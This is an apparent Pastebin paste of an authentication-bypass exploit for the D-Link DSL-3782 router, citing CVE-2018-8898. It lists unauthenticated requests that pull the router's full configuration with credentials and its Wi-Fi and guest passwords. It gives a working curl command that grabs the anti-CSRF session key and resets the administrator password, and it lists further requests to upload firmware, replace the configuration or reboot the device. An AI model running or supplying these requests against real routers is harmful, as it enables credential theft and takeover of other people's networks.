API tools faq
paste
Advertisement
xB4ckdoorREAL

[D-Link DSL 3782 XPLOIT NO-BUILT]

xB4ckdoorREAL
Nov 4th, 2018
2,249
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.01 KB | None | 0 0
raw download clone embed print report
  1. ]
  2.  
  3. #AUTH BYPASS.
  4. # Version: A1_WI_20170303 || SWVer="V100R001B012" FWVer="3.10.0.24" FirmVer="TT_77616E6771696F6E67"
  5. # Category: Webapps
  6. # CVE : CVE-2018-8898
  7. # Date: 20/05/2018
  8.  
  9. # Some of the possible actions for retrieving important information
  10. # GET http://192.168.1.1/romfile.cfg ---> retrieve the complete settings of the router (all credentials included)
  11. # GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_24.asp ---> retrieve the password for SSID of 2.4Ghz
  12. # GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_5.asp ---> retrieve the password for SSID of 5.0Ghz
  13. # GET http://192.168.1.1/cgi-bin/New_GUI/GuestZone.asp ---> retrieve the password for Guest network, if present
  14.  
  15. # For POST requests that makes changes to passwords, SSIDs name and configurations, a 'sessionKey' value is used by the web application to prevent Cross-site request forgery (CSRF) attacks.
  16. # However, this value can be retrieved with this Authentication Bypass issue with the following GET request:
  17. # 'GET http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp'
  18.  
  19. # For example, the below POST request allows to change the Web Interface Administrator's password:
  20. curl --data "Password=[NEW_PASSWORD_SET_BY_THE_ATTACKER]" \
  21. --data "sessionKey=$(curl -sS http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp)" \
  22. http://192.168.1.1/cgi-bin/New_GUI/Set/Admin.asp
  23.  
  24. # Some other possible actions for altering the configurations:
  25. # POST http://192.168.1.1/cgi-bin/New_GUI/WiFi_loding.asp ---> change passwords of the SSIDs
  26. # POST http://192.168.1.1/cgi-bin/New_GUI/Set/firmware_upgrade.asp ---> upgrade firmware
  27. # POST http://192.168.1.1/cgi-bin/New_GUI/Set/reboot_wait.asp ---> reboot router
  28. # POST /cgi-bin/New_GUI/Set/config_upgrade.asp ---> upload a new configuration file ('romfile.cfg')
  29.  
  30. # Note 1: Since the router misses a network segretation, a user that has access to the Guest network could also perform this attack.
  31. # Note 2: Web panels exposed to the Internet allows anonymous attacker to leverage this vulnerability and possibly takeover the router.
  32. # Note 3: Others forks of the firmware and software versions have not been tested.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!